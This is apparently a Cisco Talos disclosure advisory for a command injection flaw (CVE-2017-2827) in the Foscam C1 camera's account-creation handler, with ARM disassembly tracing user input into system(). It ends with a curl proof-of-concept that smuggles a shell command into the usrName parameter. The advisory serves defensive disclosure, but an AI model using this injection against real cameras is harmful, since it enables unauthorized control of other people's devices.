Headline
CVE-2017-2827: TALOS-2017-0328 || Cisco Talos Intelligence Group
An exploitable command injection vulnerability exists in the web management interface used by the Foscam C1 Indoor HD Camera running application firmware 2.52.2.37. A specially crafted HTTP request can allow for a user to inject arbitrary shell characters during account creation resulting in command injection. An attacker can simply send an HTTP request to the device to trigger this vulnerability.
Summary
An exploitable command injection vulnerability exists in the web management interface used by the Foscam C1 Indoor HD Camera running application firmware 2.52.2.37. A specially crafted HTTP request can allow for a user to inject arbitrary shell characters during account creation resulting in command injection. An attacker can simply send an HTTP request to the device to trigger this vulnerability.
Tested Versions
Foscam, Inc. Indoor IP Camera C1 Series System Firmware Version: 1.9.3.17 Application Firmware Version: 2.52.2.37 Web Version: 2.0.1.1 Plug-In Version: 3.3.0.5
Product URLs
Foscam
CVSSv3 Score
8.8 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE
CWE-78: Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)
Details
Foscam produces a series of IP-capable surveillance devices, network video recorders, and baby monitors for the end-user. Foscam produces a range of cameras for both indoor and outdoor use and with wireless capability. One of these models is the C1 series which contains a web-based user interface for management and is based on the ARM architecture. Foscam is considered one of the most common security cameras out on the current market.
When various services are started, a service will first register a callback using the CMsgClient::registerMsgHandle function [1]. This will register a function to be called [2] when another service dispatches a message of the specified code [3]. An example of this registration process is handled inside the FCGI_Init function of the “CGIProxy.fcgi” service using the following code:
.text:00009F20 FCGX_Init_1f20
.text:00009F20
.text:00009F20 F0 41 2D E9 STMFD SP!, {R4-R8,LR}
.text:00009F24 41 DE 4D E2 SUB SP, SP, #0x410
.text:00009F28 08 D0 4D E2 SUB SP, SP, #8
.text:00009F2C 05 FC FF EB BL FCGX_Init
.text:00009F2C
.text:00009F30 00 10 50 E2 SUBS R1, R0, #0
.text:00009F34 44 01 9F 15 LDRNE R0, =str.FCGX_Initfailed
.text:00009F38 05 00 00 1A BNE leave_exit_1f54
.text:00009F3C
.text:00009F3C 40 01 9F E5 LDR R0, =gv_theRequest_10b74
.text:00009F40 01 20 A0 E1 MOV R2, R1
.text:00009F44 1A FC FF EB BL FCGX_InitRequest
.text:00009F48
.text:00009F48 00 00 50 E3 CMP R0, #0
.text:00009F4C 03 00 00 0A BEQ loc_9F60
...
.text:00009F60 loc_9F60
.text:00009F60 DB FE FF EB BL registerMsgClients_1ad4 ; \
\
.text:00009AD4 registerMsgClients_1ad4
.text:00009AD4 10 40 2D E9 STMFD SP!, {R4,LR}
.text:00009AD4
.text:00009AD8 30 40 9F E5 LDR R4, =gp_cMsgClient_bac8
.text:00009ADC 30 10 9F E5 LDR R1, =0x40004001 ; [3] code
.text:00009AE0 04 00 A0 E1 MOV R0, R4
.text:00009AE4 2C 20 9F E5 LDR R2, =CgiProxySnapPicHandler_1e38 ; [2] callback function
.text:00009AE8 3D FD FF EB BL CMsgClient::registerMsgHandle(int,void (*)(char const*,int)) ; [1]
.text:00009AE8
.text:00009AEC 04 00 A0 E1 MOV R0, R4
.text:00009AF0 24 10 9F E5 LDR R1, =0x3001
.text:00009AF4 1C 20 9F E5 LDR R2, =CgiProxySnapPicHandler_1e38
.text:00009AF8 39 FD FF EB BL CMsgClient::registerMsgHandle(int,void (*)(char const*,int))
.text:00009AF8
.text:00009AFC 04 00 A0 E1 MOV R0, R4
.text:00009B00 18 10 9F E5 LDR R1, =0x3002
.text:00009B04 0C 20 9F E5 LDR R2, =CgiProxySnapPicHandler_1e38
.text:00009B08 10 40 BD E8 LDMFD SP!, {R4,LR}
.text:00009B0C 34 FD FF EA B CMsgClient::registerMsgHandle(int,void (*)(char const*,int))
After the “CGIProxy.fcgi” service decodes an HTTP request that’s forwarded from the HTTP daemon, the service will copy the decoded query into a buffer on the stack [4]. Once this is done, the buffer will then be used to pass the decoded query off to CMsgClient::sendMsg. This will dispatch the query to the shared messaging subsystem using the code 0x4001 at [5]. At this point, the service that handles the specified code will be woken up to handle the specified request.
.text:00009FA8 14 70 8D E2 ADD R7, SP, #0x430+lv_dest_41c
.text:00009FAC 08 10 A0 E1 MOV R1, R8
.text:00009FB0 07 00 A0 E1 MOV R0, R7
.text:00009FB4 34 FC FF EB BL strcpy ; [4]
.text:00009FB8
.text:00009FB8 08 00 A0 E1 MOV R0, R8
.text:00009FBC C0 FB FF EB BL strlen
.text:00009FC0
.text:00009FC0 CC 30 9F E5 LDR R3, =0x404
.text:00009FC4 00 30 8D E5 STR R3, [SP]
.text:00009FC8 C8 10 9F E5 LDR R1, =0x4001 ; [5]
.text:00009FCC 07 30 A0 E1 MOV R3, R7 ; uri request
.text:00009FD0 01 20 A0 E3 MOV R2, #1
.text:00009FD4 04 40 8D E5 STR R4, [SP,#4]
.text:00009FD8 08 40 8D E5 STR R4, [SP,#8]
.text:00009FDC 0C 40 8D E5 STR R4, [SP,#12]
.text:00009FE0 14 04 8D E5 STR R0, [SP,#0x430+var_1C]
.text:00009FE4 B0 00 9F E5 LDR R0, =gp_cMsgClient_bac8
.text:00009FE8 CD FB FF EB BL CMsgClient::sendMsg(int,char,char const*,int,int,int,char *)
The handler for code 0x4001 is in the “webService” binary and is done by the function executeCGICmd at address 0x1e5a4. At the beginning of this function, the service will call a function [6] that’s responsible for extracting the user name, password, and command that was specified within the user’s query. Once the parameters have been extracted and copied into a local buffer on the stack, the command will be passed to the function call at [7] in order to determine the correct command function which is stored to funcptr. If authentication is not required for the command, then the branch at [8] will execute the function pointer returned by findJsonCallbackCommand at [7]. If authentication is required from the command, then the user name and password will be checked via strcmp followed by the function call at [9] which will execute the function pointer.
.text:0001E5A4 executeCGICmd
.text:0001E5A4
.text:0001E5A4 F0 41 2D E9 STMFD SP!, {R4-R8,LR}
.text:0001E5A8 28 60 80 E2 ADD R6, R0, #0x28
.text:0001E5AC 11 DD 4D E2 SUB SP, SP, #0x440
.text:0001E5B0 00 80 A0 E1 MOV R8, R0
.text:0001E5B4 06 10 A0 E1 MOV R1, R6
.text:0001E5B8 C4 00 9F E5 LDR R0, =unk_D5A68
.text:0001E5BC 3A 2A 00 EB BL sub_28EAC ; [6]
.text:0001E5C0 00 70 50 E2 SUBS R7, R0, #0
.text:0001E5C4 27 00 00 0A BEQ replyMsg_1E668
.text:00028EAC sub_28EAC
.text:00028EAC
.text:00028EAC F0 47 2D E9 STMFD SP!, {R4-R10,LR}
.text:00028EB0 00 40 51 E2 SUBS R4, R1, #0
.text:00028EB4 00 80 A0 E1 MOV R8, R0
.text:00028EB8 46 DF 4D E2 SUB SP, SP, #0x118
.text:00028EBC 00 00 E0 03 MOVEQ R0, #0xFFFFFFFF
.text:00028EC0 8B 00 00 0A BEQ leaving_290F4
...
.text:00028F4C 00 00 50 E3 CMP R0, #0
.text:00028F50 0C 00 00 1A BNE findCmdCallback_28F88
...
.text:00028F88 findCmdCallback_28F88
.text:00028F88 05 00 A0 E1 MOV R0, R5
.text:00028F8C 45 1F 8D E2 ADD R1, SP, #0x138+lp_funcptr?_24
.text:00028F90 89 FC FF EB BL findJsonCallbackCommand_281BC ; [7]
.text:00028F94 00 90 50 E2 SUBS R9, R0, #0
.text:00028F98 06 00 00 0A BEQ checkIfAuthNeeded_28FB8
...
.text:00028FB8 checkIfAuthNeeded_28FB8
.text:00028FB8 14 31 9D E5 LDR R3, [SP,#0x138+lp_funcptr?_24]
.text:00028FBC 54 21 9F E5 LDR R2, =0xFFFF
.text:00028FC0 08 10 93 E5 LDR R1, [R3,#8]
.text:00028FC4 02 00 51 E1 CMP R1, R2
.text:00028FC8 06 00 00 1A BNE authenticate_28FE8
...
.text:00028FD8 04 00 A0 E1 MOV R0, R4
.text:00028FDC 33 FF 2F E1 BLX R3 ; [8]
.text:00028FE0 09 00 A0 E1 MOV R0, R9
.text:00028FE4 42 00 00 EA B leaving_290F4
...
.text:000290E0 04 00 A0 E1 MOV R0, R4
.text:000290E4 33 FF 2F E1 BLX R3 ; [9]
.text:000290E8 05 00 A0 E1 MOV R0, R5
.text:000290EC 00 00 00 EA B leaving_290F4
...
.text:000290F4 46 DF 8D E2 ADD SP, SP, #0x118
.text:000290F8 F0 87 BD E8 LDMFD SP!, {R4-R10,PC}
The handler for the “addAccount” command has an access level of 2 and points to the function sub_41C94. This command reads the following parameters from a user’s query: At [10], is the “usrName” parameter. The user’s password is at [11] as “usrPwd”. Their “privilege” level is at [12], and finally the “callbackJson” parameter at [13]. After validating that these parameters have been included, the “privilege” parameter will be converted to an integer [14] and then all 3 parameters will be passed as arguments to [15].
.text:00041C94 sub_41C94
.text:00041C94
.text:00041C94 F0 45 2D E9 STMFD SP!, {R4-R8,R10,LR}
.text:00041C98 4E DE 4D E2 SUB SP, SP, #0x4E0
.text:00041C9C 04 D0 4D E2 SUB SP, SP, #4
...
.text:00041CC4 4A 7E 8D E2 ADD R7, SP, #0x4E4+lv_usrNameString_44
...
.text:00041CCC 46 5E 8D E2 ADD R5, SP, #0x4E4+lv_usrPwdString_84
.text:00041CD0 50 11 9F E5 LDR R1, =aUsrname
.text:00041CD4 07 20 A0 E1 MOV R2, R7
.text:00041CD8 06 00 A0 E1 MOV R0, R6
.text:00041CDC 59 99 FF EB BL sub_28248 ; [10]
.text:00041CDC
.text:00041CE0 42 AE 8D E2 ADD R10, SP, #0x4E4+lv_privilegeString_c4
.text:00041CE4 40 11 9F E5 LDR R1, =aUsrpwd
.text:00041CE8 05 20 A0 E1 MOV R2, R5
.text:00041CEC 06 00 A0 E1 MOV R0, R6
.text:00041CF0 54 99 FF EB BL sub_28248 ; [11]
.text:00041CF0
.text:00041CF4 00 80 A0 E3 MOV R8, #0
.text:00041CF8 30 11 9F E5 LDR R1, =aPrivilege
.text:00041CFC 0A 20 A0 E1 MOV R2, R10
.text:00041D00 4E 4E 8D E2 ADD R4, SP, #0x4E4+lv_callbackJsonString_4
.text:00041D04 06 00 A0 E1 MOV R0, R6
.text:00041D08 4E 99 FF EB BL sub_28248 ; [12]
.text:00041D08
.text:00041D0C CC 84 64 E5 STRB R8, [R4,#-0x4CC]!
.text:00041D10 06 00 A0 E1 MOV R0, R6
.text:00041D14 18 11 9F E5 LDR R1, =aCallbackjson
.text:00041D18 04 20 A0 E1 MOV R2, R4
.text:00041D1C 49 99 FF EB BL sub_28248 ; [13]
...
.text:00041D38 A0 34 DD E5 LDRB R3, [SP,#0x4E4+var_44]
.text:00041D3C 00 00 53 E3 CMP R3, #0
.text:00041D40 02 00 00 0A BEQ loc_41D50
.text:00041D44 20 34 DD E5 LDRB R3, [SP,#0x4E4+var_C4]
.text:00041D48 00 00 53 E3 CMP R3, #0
.text:00041D4C 04 00 00 1A BNE loc_41D64
...
.text:00041D64 loc_41D64
.text:00041D64 0A 00 A0 E1 MOV R0, R10
.text:00041D68 6C 45 FF EB BL atoi ; [14]
.text:00041D68
.text:00041D6C 05 20 A0 E1 MOV R2, R5 ; usrPwd
.text:00041D70 07 10 A0 E1 MOV R1, R7 ; usrName
.text:00041D74 00 30 A0 E1 MOV R3, R0 ; privilege
.text:00041D78 BC 00 9F E5 LDR R0, =gv_authenticationObject_C5268
.text:00041D7C 44 8C FF EB BL FTPconfigUser_24E94 ; [15]
Once inside the FTPconfigUser function, the service will do a few checks to verify that the user name doesn’t already exist, that adding a user will not exceed the maximum user count, and that the privilege level is 2. If these checks are satisfied, the service will build a format string using “sh /usr/bin/ftpd/configFTP.sh 1 %s %s” and the user name and password pair [16]. Once this is done, the password will be checked to ensure that there are no ‘;’ characters used [17] and then the format string will be passed to a call to system at [18]. Due to the service not enforcing any other restrictions on the character set, this can allow an attacker to inject arbitrary characters that may be interpreted by the Bourne shell which can allow for one to execute arbitrary shell commands.
.text:00024E94 FTPconfigUser_24E94
.text:00024E94
.text:00024E94 00 00 51 E3 CMP R1, #0
.text:00024E98 00 00 52 13 CMPNE R2, #0
.text:00024E9C F0 4F 2D E9 STMFD SP!, {R4-R11,LR}
.text:00024EA0 00 40 A0 E1 MOV R4, R0
.text:00024EA4 B4 D0 4D E2 SUB SP, SP, #0xB4
.text:00024EA8 03 80 A0 E1 MOV R8, R3
.text:00024EAC 02 50 A0 E1 MOV R5, R2
.text:00024EB0 01 60 A0 E1 MOV R6, R1
.text:00024EB4 00 70 A0 13 MOVNE R7, #0
.text:00024EB8 01 70 A0 03 MOVEQ R7, #1
.text:00024EBC 00 00 E0 03 MOVEQ R0, #0xFFFFFFFF
.text:00024EC0 72 00 00 0A BEQ loc_25090
...
.text:00024FB4 0C 40 8D E2 ADD R4, SP, #0xD8+command
.text:00024FB8 00 10 A0 E3 MOV R1, #0
.text:00024FBC 64 20 A0 E3 MOV R2, #0x64
.text:00024FC0 04 00 A0 E1 MOV R0, R4
.text:00024FC4 C7 B7 FF EB BL memset
.text:00024FC8 64 10 A0 E3 MOV R1, #0x64
.text:00024FCC 1C 21 9F E5 LDR R2, =aShUsrBinFtpd_0 ; "sh /usr/bin/ftpd/configFTP.sh 1 %s %s"
.text:00024FD0 06 30 A0 E1 MOV R3, R6
.text:00024FD4 04 00 A0 E1 MOV R0, R4
.text:00024FD8 00 50 8D E5 STR R5, [SP,#0xD8+var_D8]
.text:00024FDC 41 B6 FF EB BL snprintf ; [16]
.text:00024FE0
.text:00024FE0 05 00 A0 E1 MOV R0, R5
.text:00024FE4 3B 10 A0 E3 MOV R1, #';'
.text:00024FE8 DE B8 FF EB BL strchr ; [17]
.text:00024FEC
.text:00024FEC 00 00 50 E3 CMP R0, #0
.text:00024FF0 23 00 00 0A BEQ loc_25084
...
.text:00025084 0C 00 8D E2 ADD R0, SP, #0xD8+command
.text:00025088 2F B5 FF EB BL system ; [18]
Exploit Proof-of-Concept
This vulnerability is reachable by the “addAccount” command and requires privileges to create a new account. Both the “usrName” and “usrPwd” parameters can be injected into although only the “newPwd” parameter is filtered for ‘;’ characters.
```
$ usr="admin"
$ pwd=""
$ newUser=`perl -MURI::Escape -e 'print uri_escape("\\$(echo y>/tmp/www/injected.txt)")'`
$ newPwd=`perl -MURI::Escape -e 'print uri_escape("valid-password")'`
$ curl "http://$SERVER/cgi-bin/CGIProxy.fcgi?usr=${usr}&pwd=${pwd}&cmd=addAccount&usrName=${newUser}&usrPwd=${newPwd}&privilege=2&callbackJson="
```
Timeline
2017-05-08 - Vendor Disclosure
2017-06-19 - Public Release
Discovered by Claudio Bozzato and another member of Cisco Talos.